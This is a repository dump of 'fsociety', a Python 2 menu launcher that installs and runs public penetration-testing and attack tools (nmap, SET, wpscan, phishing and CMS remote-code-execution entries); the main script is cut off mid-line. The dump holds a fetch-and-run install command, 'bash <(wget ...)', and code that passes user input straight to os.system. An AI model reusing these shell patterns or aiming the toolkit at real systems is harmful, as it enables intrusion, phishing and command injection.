[ { "path": ".gitignore", "content": "install\nlogs/\ntools/\n.DS_Store\n" }, { "path": "CODE_OF_CONDUCT.md", "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment include:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or advances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at manis98@live.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]\n\n[homepage]: http://contributor-covenant.org\n[version]: http://contributor-covenant.org/version/1/4/\n" }, { "path": "CONTRIBUTING.md", "content": "\n" }, { "path": "Dockerfile", "content": "# Use Python 2.7 Slim\nFROM python:2.7-slim\n\n# Update Repos\nRUN apt-get update \\\n && apt-get install -qq -y --no-install-recommends build-essential sudo git wget curl nmap ruby \\\n && apt-get clean\n\n# Install Python dependecies\nRUN pip install requests\n\n# Install fsociety\nRUN git clone https://github.com/Manisso/fsociety.git \\\n && cd fsociety \\\n && chmod +x install.sh \\\n && ./install.sh\n\n# Change workdir\nWORKDIR /root/.fsociety/\n\n# Hack to keep the container running\nCMD python -c \"import signal; signal.pause()\"\n" }, { "path": "ISSUE_TEMPLATE.md", "content": "## Checkboxes\n\n- [ ] Updated fsociety\n- [ ] Issue does not already exist\n- [ ] fsociety issue, not a tool issue\n\n## Expected Result\n\n```bash\n\n```\n\n## Actual Result\n\n```bash\n\n```\n\n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2016-2020 Manisso\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# Fsociety Hacking Tools Pack\n\n[![Python2.7](https://img.shields.io/badge/Python-2.7-green.svg?style=flat-square)](https://www.python.org/downloads/release/python-2714/) \n![OS](https://img.shields.io/badge/Tested%20On-Linux%20|%20OSX%20|%20Windows%20|%20Android-yellowgreen.svg?style=flat-square) \n![Docker](https://img.shields.io/docker/automated/jrottenberg/ffmpeg.svg?style=flat-square) \n[![License](https://img.shields.io/badge/License-MIT-blue.svg?style=flat-square)](https://github.com/Manisso/fsociety/blob/master/LICENSE)\n\nA Penetration Testing Framework, you will have every script that a hacker needs. Works with Python 2. For a Python 3 version see our updated version at [`fsociety-team/fsociety`](https://github.com/fsociety-team/fsociety).\n\n## Fsociety Contains All Tools Used in Mr. Robot Series\n\n[![Mr. Robot](http://nikolaskama.me/content/images/2016/07/mr-robot-1.gif)](https://wikipedia.org/wiki/Mr._Robot)\n\n## Menu\n\n- Information Gathering\n- Password Attacks\n- Wireless Testing\n- Exploitation Tools\n- Sniffing & Spoofing\n- Web Hacking\n- Private Web Hacking\n- Post Exploitation\n- Contributors\n- Install & Update\n\n### Information Gathering:\n\n- Nmap\n- Setoolkit\n- Host To IP\n- WPScan\n- CMS Scanner\n- XSStrike\n- Dork - Google Dorks Passive Vulnerability Auditor\n- Scan A server's Users\n- Crips\n\n### Password Attacks:\n\n- Cupp\n- Ncrack\n\n### Wireless Testing:\n\n- Reaver\n- Pixiewps\n- Bluetooth Honeypot\n\n### Exploitation Tools:\n\n- ATSCAN\n- sqlmap\n- Shellnoob\n- Commix\n- FTP Auto Bypass\n- JBoss Autopwn\n\n### Sniffing & Spoofing:\n\n- Setoolkit\n- SSLtrip\n- pyPISHER\n- SMTP Mailer\n\n### Web Hacking:\n\n- Drupal Hacking\n- Inurlbr\n- Wordpress & Joomla Scanner\n- Gravity Form Scanner\n- File Upload Checker\n- Wordpress Exploit Scanner\n- Wordpress Plugins Scanner\n- Shell and Directory Finder\n- Joomla! 1.5 - 3.4.5 remote code execution\n- Vbulletin 5.X remote code execution\n- BruteX - Automatically brute force all services running on a target\n- Arachni - Web Application Security Scanner Framework\n\n### Private Web Hacking:\n\n- Get all websites\n- Get joomla websites\n- Get wordpress websites\n- Control Panel Finder\n- Zip Files Finder\n- Upload File Finder\n- Get server users\n- SQli Scanner\n- Ports Scan (range of ports)\n- Ports Scan (common ports)\n- Get server Info\n- Bypass Cloudflare\n\n### Post Exploitation:\n\n- Shell Checker\n- POET\n- Weeman\n\n# Installation\n\n## Installation [Linux](https://wikipedia.org/wiki/Linux) [![alt tag](http://icons.iconarchive.com/icons/dakirby309/simply-styled/32/OS-Linux-icon.png)](https://fr.wikipedia.org/wiki/Linux)\n\n```bash\nbash <(wget -qO- https://git.io/vAtmB)\n```\n\n## Installation\n\nDownload [Termux](https://play.google.com/store/apps/details?id=com.termux)\n\n```bash\nbash <(wget -qO- https://git.io/vAtmB)\n```\n\nFollow this video [Arif - Tech](https://www.youtube.com/watch?v=JwK5oOBjpgQ)\n\n## Installation [Windows](https://wikipedia.org/wiki/Microsoft_Windows)[![alt tag](http://icons.iconarchive.com/icons/yootheme/social-bookmark/32/social-windows-button-icon.png)](https://fr.wikipedia.org/wiki/Microsoft_Windows)\n\nDownload Linux Bash Like [Cygwin](https://www.cygwin.com/)\n\nDownload [Python](https://www.python.org/downloads/release/python-2714/)\n\nUse Google Cloud Console [Cloud Shell](https://console.cloud.google.com/cloudshell/editor?project=&pli=1&shellonly=true)\n\nOr use free Ubuntu VPS [c9.io](https://c9.io/)\n\n## [Docker](https://en.wikipedia.org/wiki/Docker_(software)) Usage ![docker logo](https://png.icons8.com/color/50/000000/docker.png)\n\n### Dependecies\n\n[Docker](https://www.docker.com/)\n\n[Docker-compose](https://docs.docker.com/compose/install/)\n\n```bash\ndocker-compose build\ndocker-compose up -d\ndocker-compose exec fsociety fsociety\ndocker-compose down # destroys instance\n```\n\n# Screenshots\n\n[![asciicast](https://asciinema.org/a/URj2nvpbYpeJyJe43KlASZ7fz.png)](https://asciinema.org/a/URj2nvpbYpeJyJe43KlASZ7fz)\n\n![alt logo](https://media.giphy.com/media/xT0xeFxyHAKirrLa24/giphy.gif)\n\n# Contributors\n\n[alexcreek](https://github.com/alexcreek)\n\n[mswell](https://github.com/mswell)\n\n[Ev3](https://github.com/Ev3)\n\n[huangsam](https://github.com/huangsam)\n\n[RyanFilho](https://github.com/RyanFilho)\n\n[gabru-md](https://github.com/gabru-md)\n\n[jdrago999](https://github.com/jdrago999)\n\n[CRO-TheHacker](https://github.com/CRO-THEHACKER)\n\n# License\n\n[MIT Licence](https://github.com/Manisso/fsociety/blob/master/LICENSE)\n" }, { "path": "docker-compose.yml", "content": "version: '2'\n\nservices:\n fsociety:\n build: .\n" }, { "path": "docs/css/style.css", "content": "@font-face {\n font-family: \"MR ROBOT\";\n src: url(\"../fonts/MR ROBOT.ttf\");\n}\n\n.robot-text {\n font-family: 'MR ROBOT', 'Lucida Console';\n color: red;\n}\n\na:hover {\n color: OrangeRed;\n}\n\n.robot-logo {\n font-family: 'MR ROBOT', 'Lucida Console';\n color: red;\n font-size: 25px;\n}\n\n.robot-excerpt {\n font-size: 12px;\n}\n\n.robot-card {\n height: 125px;\n}\n\n.robot-hr {\n width: 25%;\n border-top: 3px solid red;\n}\n\n.robot-btn {\n color: white;\n background-color: red;\n}\n" }, { "path": "docs/favicon/browserconfig.xml", "content": "\n#ffffff" }, { "path": "docs/favicon/manifest.json", "content": "{\n \"name\": \"App\",\n \"icons\": [\n {\n \"src\": \"\\/android-icon-36x36.png\",\n \"sizes\": \"36x36\",\n \"type\": \"image\\/png\",\n \"density\": \"0.75\"\n },\n {\n \"src\": \"\\/android-icon-48x48.png\",\n \"sizes\": \"48x48\",\n \"type\": \"image\\/png\",\n \"density\": \"1.0\"\n },\n {\n \"src\": \"\\/android-icon-72x72.png\",\n \"sizes\": \"72x72\",\n \"type\": \"image\\/png\",\n \"density\": \"1.5\"\n },\n {\n \"src\": \"\\/android-icon-96x96.png\",\n \"sizes\": \"96x96\",\n \"type\": \"image\\/png\",\n \"density\": \"2.0\"\n },\n {\n \"src\": \"\\/android-icon-144x144.png\",\n \"sizes\": \"144x144\",\n \"type\": \"image\\/png\",\n \"density\": \"3.0\"\n },\n {\n \"src\": \"\\/android-icon-192x192.png\",\n \"sizes\": \"192x192\",\n \"type\": \"image\\/png\",\n \"density\": \"4.0\"\n }\n ]\n}" }, { "path": "docs/index.html", "content": "\n\n\n\n\n \n \n \n fsociety - Penetration Testing Framework\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n\n\n\n \n
\n
\n

fsociety

\n

\n \n \n \n

\n

A Penetration Testing Framework with every script that a hacker needs.

\n

Contains all tools used in the Mr. Robot TV series

\n
\n
\n
\n
\n

Features

\n
\n
\n
\n
\n
Information Gathering
\n

Collect host metadata about services and users.

\n
\n
\n
\n
\n
\n
\n
Password Attacks
\n

Crack passwords and create wordlists.

\n
\n
\n
\n
\n
\n
\n
Wireless Testing
\n

Used for intrusion detection and wifi attacks.

\n
\n
\n
\n
\n
\n
\n
Exploitation Tools
\n

Acesss systems and data with service-oriented exploits.

\n
\n
\n
\n
\n
\n
\n
Sniffing & Spoofing
\n

Listen to network traffic or fake a network entity.

\n
\n
\n
\n
\n
\n
\n
Web Hacking
\n

Exploit popular CMSs that are hosted online.

\n
\n
\n
\n
\n
\n
\n
Private Web Hacking
\n

Access files and databases.

\n
\n
\n
\n
\n
\n
\n
Post Exploitation
\n

Exploits for after you have already gained access.

\n
\n
\n
\n
\n
\n
\n

Install

\n bash <(wget -qO- https://git.io/vAtmB)\n
\n
\n
\n

Contributors

\n \"Manisso\"\n \"CRO-THEHACKER\"\n \"huangsam\"\n \"alexcreek\"\n \"mswell\"\n \"jackric\"\n \"Ev3\"\n \"RyanFilho\"\n \"gabru-md\"\n \"jdrago999\"\n
\n
\n \n \n \n \n \n\n\n\n" }, { "path": "fsociety.cfg", "content": "[fsociety]\nagreement = false\ntoolDir = tools/\nlogDir = logs/\nyes = yes y ye ya yep yeah yee yeperoo not-no\n" }, { "path": "fsociety.py", "content": "#!/usr/bin/env python2\n# ______ _ _ _______\n# | ____| (_) | | |__ __|\n# | |__ ___ ___ ___ _ ___| |_ _ _ | | ___ __ _ _ __ ___\n# | __/ __|/ _ \\ / __| |/ _ \\ __| | | | | |/ _ \\/ _` | '_ ` _ \\\n# | | \\__ \\ (_) | (__| | __/ |_| |_| | | | __/ (_| | | | | | |\n# |_| |___/\\___/ \\___|_|\\___|\\__|\\__, | |_|\\___|\\__,_|_| |_| |_|\n# __/ |\n# |___/\n#\n#\n# Greet's To\n# IcoDz - Canejo\n# Tool For Hacking\n# Author : Manisso\n\n'''\nImports\n'''\nimport sys\nimport argparse\nimport os\nimport httplib\nimport subprocess\nimport re\nimport urllib2\nimport socket\nimport urllib\nimport sys\nimport json\nimport telnetlib\nimport glob\nimport random\nimport Queue\nimport threading\nimport base64\nimport time\nimport ConfigParser\nfrom sys import argv\nfrom commands import *\nfrom getpass import getpass\nfrom xml.dom import minidom\nfrom urlparse import urlparse\nfrom optparse import OptionParser\nfrom time import gmtime, strftime, sleep\n\n'''\nCommon Functions\n'''\n\n\nclass color:\n HEADER = '\\033[95m'\n IMPORTANT = '\\33[35m'\n NOTICE = '\\033[33m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n RED = '\\033[91m'\n END = '\\033[0m'\n UNDERLINE = '\\033[4m'\n LOGGING = '\\33[34m'\n\n\ndef clearScr():\n os.system('clear')\n\n\ndef yesOrNo():\n return (raw_input(\"Continue Y / N: \") in yes)\n\n\n'''\nConfig\n'''\ninstallDir = os.path.dirname(os.path.abspath(__file__)) + '/'\nconfigFile = installDir + \"/fsociety.cfg\"\nprint(installDir)\nconfig = ConfigParser.RawConfigParser()\nconfig.read(configFile)\n\ntoolDir = installDir + config.get('fsociety', 'toolDir')\nlogDir = installDir + config.get('fsociety', 'logDir')\nyes = config.get('fsociety', 'yes').split()\ncolor_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]\nrandom.shuffle(color_random)\nfsocietylogo = color_random[0] + '''\n d88888b .d8888. .d88b. .o88b. d888888b d88888b d888888b db db\n 88' 88' YP .8P Y8. d8P Y8 `88' 88 88 `8b d8'\n 88ooo `8bo. 88 88 8P 88 88ooooo 88 `8bd8'\n 88 `Y8b. 88 88 8b 88 88 88 88\n 88 db 8D `8b d8' Y8b d8 .88. 88. 88 88\n YP `8888Y' `Y88P' `Y88P' Y888888P Y88888P YP YP\n '''\nfsocietyPrompt = \"fsociety ~# \"\nalreadyInstalled = \"Already Installed\"\ncontinuePrompt = \"\\nClick [Return] to continue\"\n\ntermsAndConditions = color.NOTICE + '''\nI shall not use fsociety to:\n(i) upload or otherwise transmit, display or distribute any\ncontent that infringes any trademark, trade secret, copyright\nor other proprietary or intellectual property rights of any\nperson; (ii) upload or otherwise transmit any material that contains\nsoftware viruses or any other computer code, files or programs\ndesigned to interrupt, destroy or limit the functionality of any\ncomputer software or hardware or telecommunications equipment;\n''' + color.END\n\nmrrobot4 = color.NOTICE + '''\nHello,\n\nAs we all know, Mr. Robot 4.0 is comming out - the end of Mr. Robot.\n\nWe will update to python3.7 & add all of the new hacking tool of 4.0 later this year\nThere will be no more updates after the show is done.\nThis is to keep cannon to the show.))\n\nThank you for all the sourport over the years, the fsociety team thanks you!\nFeel free to join the NEW DISCORD!!!\nAnything Mr. Robot will be on the server!\n\n[ https://discord.gg/xB87X9z ]\n\n\n\nThanks for reading,\nZachary, CRO-THEHACKER - Dev'''\n\n'''\nStarts Menu Classes\n'''\ndef agreement():\n while not config.getboolean(\"fsociety\", \"agreement\"):\n clearScr()\n print(termsAndConditions)\n print(mrrobot4)\n agree = raw_input(\"You must agree to our terms and conditions first (Y/n) \").lower()\n if agree in yes:\n config.set('fsociety', 'agreement', 'true')\n\nclass fsociety:\n def __init__(self):\n clearScr()\n self.createFolders()\n print (fsocietylogo + color.RED + '''\n }--------------{+} Coded By Manisso {+}--------------{\n }--------{+} GitHub.com/Manisso/fsociety {+}--------{\n ''' + color.END + '''\n {1}--Information Gathering\n {2}--Password Attacks\n {3}--Wireless Testing\n {4}--Exploitation Tools\n {5}--Sniffing & Spoofing\n {6}--Web Hacking\n {7}--Private Web Hacking\n {8}--Post Exploitation\n {0}--INSTALL & UPDATE\n {11}-CONTRIBUTORS\n {99}-EXIT\\n\n ''')\n choice = raw_input(fsocietyPrompt)\n clearScr()\n if choice == \"1\":\n informationGatheringMenu()\n elif choice == \"2\":\n passwordAttacksMenu()\n elif choice == \"3\":\n wirelessTestingMenu()\n elif choice == \"4\":\n exploitationToolsMenu()\n elif choice == \"5\":\n sniffingSpoofingMenu()\n elif choice == \"6\":\n webHackingMenu()\n elif choice == \"7\":\n privateWebHacking()\n elif choice == \"8\":\n postExploitationMenu()\n elif choice == \"0\":\n self.update()\n elif choice == \"11\":\n self.githubContributors()\n elif choice == \"99\":\n with open(configFile, 'wb') as configfile:\n config.write(configfile)\n sys.exit()\n elif choice == \"\\r\" or choice == \"\\n\" or choice == \"\" or choice == \" \":\n self.__init__()\n else:\n try:\n print(os.system(choice))\n except:\n pass\n self.completed()\n\n def githubContributors(self):\n clearScr()\n print('''\n dP\"\"b8 dP\"Yb 88b 88 888888 88\"\"Yb 88 88\"\"Yb .dP\"Y8\n dP `\" dP Yb 88Yb88 88 88__dP 88 88__dP `Ybo.\"\n Yb Yb dP 88 Y88 88 88\"Yb 88 88\"\"Yb o.`Y8b\n YboodP YbodP 88 Y8 88 88 Yb 88 88oodP 8bodP'\n ''')\n contributorsURL = 'https://api.github.com/repos/manisso/fsociety/contributors'\n jsonResponseList = json.loads(urllib2.urlopen(contributorsURL).read())\n for dictionary in jsonResponseList:\n print(\" * %s\" % dictionary['login'])\n print('\\n')\n\n def createFolders(self):\n if not os.path.isdir(toolDir):\n os.makedirs(toolDir)\n if not os.path.isdir(logDir):\n os.makedirs(logDir)\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n def update(self):\n os.system(\"git clone --depth=1 https://github.com/Manisso/fsociety.git\")\n os.system(\"cd fsociety && bash ./update.sh\")\n os.system(\"fsociety\")\n\n\nclass sniffingSpoofingMenu:\n menuLogo = '''\n .dP\"Y8 88b 88 88 888888 888888 88 88b 88 dP\"\"b8\n `Ybo.\" 88Yb88 88 88__ 88__ 88 88Yb88 dP `\"\n o.`Y8b 88 Y88 88 88\"\" 88\"\" 88 88 Y88 Yb \"88\n 8bodP' 88 Y8 88 88 88 88 88 Y8 YboodP\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\n \" {1}--SEToolkit - Tool aimed at penetration testing around Social-Engineering\")\n print(\" {2}--SSLtrip - MITM tool that implements SSL stripping attacks\")\n print(\n \" {3}--pyPISHER - Tool to create a mallicious website for password pishing\")\n print(\" {4}--SMTP Mailer - Tool to send SMTP mail\\n \")\n print(\" {99}-Back To Main Menu \\n\")\n choice6 = raw_input(fsocietyPrompt)\n clearScr()\n if choice6 == \"1\":\n setoolkit()\n elif choice6 == \"2\":\n ssls()\n elif choice6 == \"3\":\n pisher()\n elif choice6 == \"4\":\n smtpsend()\n elif choice6 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass webHackingMenu:\n menuLogo = '''\n Yb dP 888888 88\"\"Yb\n Yb db dP 88__ 88__dP\n YbdPYbdP 88\"\" 88\"\"Yb\n YP YP 888888 88oodP\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\" {1}--Drupal Hacking \")\n print(\" {2}--Inurlbr\")\n print(\" {3}--Wordpress & Joomla Scanner\")\n print(\" {4}--Gravity Form Scanner\")\n print(\" {5}--File Upload Checker\")\n print(\" {6}--Wordpress Exploit Scanner\")\n print(\" {7}--Wordpress Plugins Scanner\")\n print(\" {8}--Shell and Directory Finder\")\n print(\" {9}--Joomla! 1.5 - 3.4.5 remote code execution\")\n print(\" {10}-Vbulletin 5.X remote code execution\")\n print(\n \" {11}-BruteX - Automatically brute force all services running on a target\")\n print(\" {12}-Arachni - Web Application Security Scanner Framework \\n \")\n print(\" {99}-Back To Main Menu \\n\")\n choiceweb = raw_input(fsocietyPrompt)\n clearScr()\n if choiceweb == \"1\":\n maine()\n elif choiceweb == \"2\":\n ifinurl()\n elif choiceweb == '3':\n wppjmla()\n elif choiceweb == \"4\":\n gravity()\n elif choiceweb == \"5\":\n sqlscan()\n elif choiceweb == \"6\":\n wpminiscanner()\n elif choiceweb == \"7\":\n wppluginscan()\n elif choiceweb == \"8\":\n shelltarget()\n elif choiceweb == \"9\":\n joomlarce()\n elif choiceweb == \"10\":\n vbulletinrce()\n elif choiceweb == \"11\":\n brutex()\n elif choiceweb == \"12\":\n arachni()\n elif choiceweb == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass privateWebHacking:\n menuLogo = '''\n 88\"\"Yb 88\"\"Yb 88 Yb dP db 888888 888888\n 88__dP 88__dP 88 Yb dP dPYb 88 88__\n 88\"\"\" 88\"Yb 88 YbdP dP__Yb 88 88\"\"\n 88 88 Yb 88 YP dP\"\"\"\"Yb 88 888888\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n target = raw_input(\"Enter Target IP: \")\n Fscan(target)\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass postExploitationMenu:\n menuLogo = '''\n 88\"\"Yb dP\"Yb .dP\"Y8 888888\n 88__dP dP Yb `Ybo.\" 88\n 88\"\"\" Yb dP o.`Y8b 88\n 88 YbodP 8bodP' 88\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n print(\" {1}--Shell Checker\")\n print(\" {2}--POET\")\n print(\" {3}--Phishing Framework \\n\")\n print(\" {99}-Return to main menu \\n \")\n choice11 = raw_input(fsocietyPrompt)\n clearScr()\n if choice11 == \"1\":\n sitechecker()\n elif choice11 == \"2\":\n poet()\n elif choice11 == \"3\":\n weeman()\n elif choice11 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\n'''\nInformation Gathering Tools Classes\n'''\n\n\nclass informationGatheringMenu:\n menuLogo = '''\n 88 88b 88 888888 dP\"Yb\n 88 88Yb88 88__ dP Yb\n 88 88 Y88 88\"\" Yb dP\n 88 88 Y8 88 YbodP\n '''\n\n def __init__(self):\n clearScr()\n print(self.menuLogo)\n\n print(\" {1}--Nmap - Network Mapper\")\n print(\" {2}--Setoolkit\")\n print(\" {3}--Host To IP\")\n print(\" {4}--WPScan\")\n print(\" {5}--CMSmap\")\n print(\" {6}--XSStrike\")\n print(\" {7}--Doork\")\n print(\" {8}--Crips\\n \")\n print(\" {99}-Back To Main Menu \\n\")\n choice2 = raw_input(fsocietyPrompt)\n clearScr()\n if choice2 == \"1\":\n nmap()\n elif choice2 == \"2\":\n setoolkit()\n elif choice2 == \"3\":\n host2ip()\n elif choice2 == \"4\":\n wpscan()\n elif choice2 == \"5\":\n CMSmap()\n elif choice2 == \"6\":\n XSStrike()\n elif choice2 == \"7\":\n doork()\n elif choice2 == \"8\":\n crips()\n elif choice2 == \"99\":\n fsociety()\n else:\n self.__init__()\n self.completed()\n\n def completed(self):\n raw_input(\"Completed, click return to go back\")\n self.__init__()\n\n\nclass nmap:\n nmapLogo = '''\n 88b 88 8b d8 db 88\"\"Yb\n 88Yb88 88b d88 dPYb 88__dP\n 88 Y88 88YbdP88 dP__Yb 88\"\"\"\n 88 Y8 88 YY 88 dP\"\"\"\"Yb 88\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"nmap\"\n self.gitRepo = \"https://github.com/nmap/nmap.git\"\n\n self.targetPrompt = \" Enter Target IP/Subnet/Range/Host: \"\n\n if not self.installed():\n self.install()\n self.run()\n else:\n self.run()\n\n def installed(self):\n return (os.path.isfile(\"/usr/bin/nmap\") or os.path.isfile(\"/usr/local/bin/nmap\"))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"cd %s && ./configure && make && make install\" %\n self.installDir)\n\n def run(self):\n clearScr()\n print(self.nmapLogo)\n target = raw_input(self.targetPrompt)\n self.menu(target)\n\n def menu(self, target):\n clearScr()\n print(self.nmapLogo)\n print(\" Nmap scan for: %s\\n\" % target)\n print(\" {1}--Simple Scan [-sV]\")\n print(\" {2}--Port Scan [-Pn]\")\n print(\" {3}--Operating System Detection [-A]\\n\")\n print(\" {99}-Return to information gathering menu \\n\")\n response = raw_input(\"nmap ~# \")\n clearScr()\n logPath = \"logs/nmap-\" + strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime())\n try:\n if response == \"1\":\n os.system(\"nmap -sV -oN %s %s\" % (logPath, target))\n response = raw_input(continuePrompt)\n elif response == \"2\":\n os.system(\"nmap -Pn -oN %s %s\" % (logPath, target))\n response = raw_input(continuePrompt)\n elif response == \"3\":\n os.system(\"nmap -A -oN %s %s\" % (logPath, target))\n response = raw_input(continuePrompt)\n elif response == \"99\":\n pass\n else:\n self.menu(target)\n except KeyboardInterrupt:\n self.menu(target)\n\n\nclass setoolkit:\n def __init__(self):\n self.installDir = toolDir + \"setoolkit\"\n self.gitRepo = \"https://github.com/trustedsec/social-engineer-toolkit.git\"\n\n if not self.installed():\n self.install()\n self.run()\n else:\n print(alreadyInstalled)\n self.run()\n response = raw_input(continuePrompt)\n\n def installed(self):\n return (os.path.isfile(\"/usr/bin/setoolkit\"))\n\n def install(self):\n os.system(\"apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php \\\n python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl\")\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n os.system(\"cd %s && python setup.py install\" % self.installDir)\n\n def run(self):\n os.system(\"setoolkit\")\n\n\nclass host2ip:\n host2ipLogo = '''\n 88 88 dP\"Yb .dP\"Y8 888888 oP\"Yb. 88 88\"\"Yb\n 88 88 dP Yb `Ybo.\" 88 \"' dP' 88 88__dP\n 888888 Yb dP o.`Y8b 88 dP' 88 88\"\"\"\n 88 88 YbodP 8bodP' 88 .d8888 88 88\n '''\n\n def __init__(self):\n clearScr()\n print(self.host2ipLogo)\n host = raw_input(\" Enter a Host: \")\n ip = socket.gethostbyname(host)\n print(\" %s has the IP of %s\" % (host, ip))\n response = raw_input(continuePrompt)\n\n\nclass wpscan:\n wpscanLogo = '''\n Yb dP 88\"\"Yb .dP\"Y8 dP\"\"b8 db 88b 88\n Yb db dP 88__dP `Ybo.\" dP `\" dPYb 88Yb88\n YbdPYbdP 88\"\"\" o.`Y8b Yb dP__Yb 88 Y88\n YP YP 88 8bodP' YboodP dP\"\"\"\"Yb 88 Y8\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"wpscan\"\n self.gitRepo = \"https://github.com/wpscanteam/wpscan.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.wpscanLogo)\n target = raw_input(\" Enter a Target: \")\n self.menu(target)\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone --depth=1 %s %s\" %\n (self.gitRepo, self.installDir))\n\n def menu(self, target):\n clearScr()\n print(self.wpscanLogo)\n print(\" WPScan for: %s\\n\" % target)\n print(\" {1}--Username Enumeration [--enumerate u]\")\n print(\" {2}--Plugin Enumeration [--enumerate p]\")\n print(\" {3}--All Enumeration Tools [--enumerate]\\n\")\n print(\" {99}-Return to information gathering menu \\n\")\n response = raw_input(\"wpscan ~# \")\n clearScr()\n logPath = \"../../logs/wpscan-\" + \\\n strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime()) + \".txt\"\n wpscanOptions = \"--no-banner --random-agent --url %s\" % target\n try:\n if response == \"1\":\n os.system(\n \"ruby tools/wpscan/wpscan.rb %s --enumerate u --log %s\" % (wpscanOptions, logPath))\n response = raw_input(continuePrompt)\n elif response == \"2\":\n os.system(\n \"ruby tools/wpscan/wpscan.rb %s --enumerate p --log %s\" % (wpscanOptions, logPath))\n response = raw_input(continuePrompt)\n elif response == \"3\":\n os.system(\n \"ruby tools/wpscan/wpscan.rb %s --enumerate --log %s\" % (wpscanOptions, logPath))\n response = raw_input(continuePrompt)\n elif response == \"99\":\n pass\n else:\n self.menu(target)\n except KeyboardInterrupt:\n self.menu(target)\n\n\nclass CMSmap:\n CMSmapLogo = '''\n dP\"\"b8 8b d8 .dP\"Y8 8b d8 db 88\"\"Yb\n dP `\" 88b d88 `Ybo.\" 88b d88 dPYb 88__dP\n Yb 88YbdP88 o.`Y8b 88YbdP88 dP__Yb 88\"\"\"\n YboodP 88 YY 88 8bodP' 88 YY 88 dP\"\"\"\"Yb 88\n '''\n\n def __init__(self):\n self.installDir = toolDir + \"CMSmap\"\n self.gitRepo = \"https://github.com/Dionach/CMSmap.git\"\n\n if not self.installed():\n self.install()\n clearScr()\n print(self.CMSmapLogo)\n target = raw_input(\" Enter a Target: \")\n self.run(target)\n response = raw_input(continuePrompt)\n\n def installed(self):\n return (os.path.isdir(self.installDir))\n\n def install(self):\n os.system(\"git clone 